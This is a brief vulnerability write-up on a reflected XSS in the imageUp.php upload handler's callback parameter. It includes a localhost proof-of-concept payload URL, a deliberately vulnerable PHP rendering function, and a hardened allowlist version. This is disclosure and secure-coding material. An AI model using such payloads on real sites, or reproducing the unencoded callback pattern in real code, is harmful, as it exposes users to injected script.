CVE
This article was last updated on the afternoon of March 3, 2026
Testing environment: localhost
Windows + Edge + PhpStorm + Burp Suite Pro + Apache2 + PHP 5.6.9
1. Vulnerability analysis
/php/imageUp.php

After the site reads the GET parameter, it concatenates the value directly into <script></script> without validation or encoding, causing a reflected XSS vulnerability.
2. Exploitation of the vulnerability
Payload: http://127.0.0.1/php/imageUp.php?callback=alert('xss')

This issue exists in all language versions of imageUp.
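The pattern described above next to a hardened form, as an added example that is not the project's own code. The function names, the sample response data and the 64-character limit are assumptions; only the `callback` parameter and the <script></script> wrapping come from this write-up.

```php
<?php
// Added illustration, not the imageUp source. Function names and the
// response array are hypothetical; written to run on PHP 5.6.

// Vulnerable pattern: the raw GET value becomes JavaScript source text.
function render_vulnerable($callback, $result)
{
    return '<script>' . $callback . '(' . json_encode($result) . ')</script>';
}

// Hardened pattern: accept only a dotted JavaScript identifier path
// (e.g. "parent.onUpload"). Anything else returns null so the caller can
// answer with HTTP 400 instead of echoing the value back.
function render_hardened($callback, $result)
{
    if (!is_string($callback)
        || strlen($callback) > 64
        || !preg_match('/\A[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*\z/', $callback)) {
        return null;
    }
    // JSON_HEX_* flags stop "</script>", "&" and quotes inside the data
    // from closing the script block or breaking out of a string.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<script>' . $callback . '(' . json_encode($result, $flags) . ')</script>';
}

// Constructed sample inputs: one legitimate callback name, the value from
// the payload above, and one value that tries to close the script block.
$result  = array('state' => 'SUCCESS', 'url' => 'upload/a.png');
$samples = array('parent.onUpload', "alert('xss')", 'x</script><b>');

foreach ($samples as $cb) {
    $out = render_hardened($cb, $result);
    echo str_pad($cb, 18), ' => ', ($out === null ? 'rejected' : $out), "\n";
}
```

In a real handler the value would come from `$_GET['callback']`, and a null return from `render_hardened` would map to a 400 response.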